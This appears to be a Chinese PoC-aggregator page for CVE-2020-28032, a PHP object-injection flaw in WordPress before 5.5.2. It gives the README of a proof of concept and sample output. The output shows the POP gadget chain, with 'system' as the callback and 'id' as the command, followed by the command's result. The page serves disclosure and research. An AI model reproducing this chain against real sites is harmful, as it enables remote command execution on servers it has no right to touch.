关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2020-28032)
描述:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 5.5.2 之前版本存在安全漏洞,该漏洞由于WordPress 在wp-includes/Requests/Utility/FilteredIterator.php中处理反序列化不当。
描述
PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)
介绍
# CVE-2020-28032_PoC
PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)
## Example output
```
nth347@ubuntu:~$ php CVE-2020-28032_PoC.php
WC_Log_Handler_File Object
(
[handles:protected] => Requests_Utility_FilteredIterator Object
(
[callback:protected] => system
[storage:ArrayIterator:private] => Array
(
[0] => id
)
)
)
uid=1000(nth347) gid=1000(nth347) groups=1000(nth347),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)
```
文件快照
[4.0K] /data/pocs/492bd1180291e7c318956a9fe7fa4fc786487e6c
├── [1.1K] CVE-2020-28032_PoC.php
└── [ 620] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。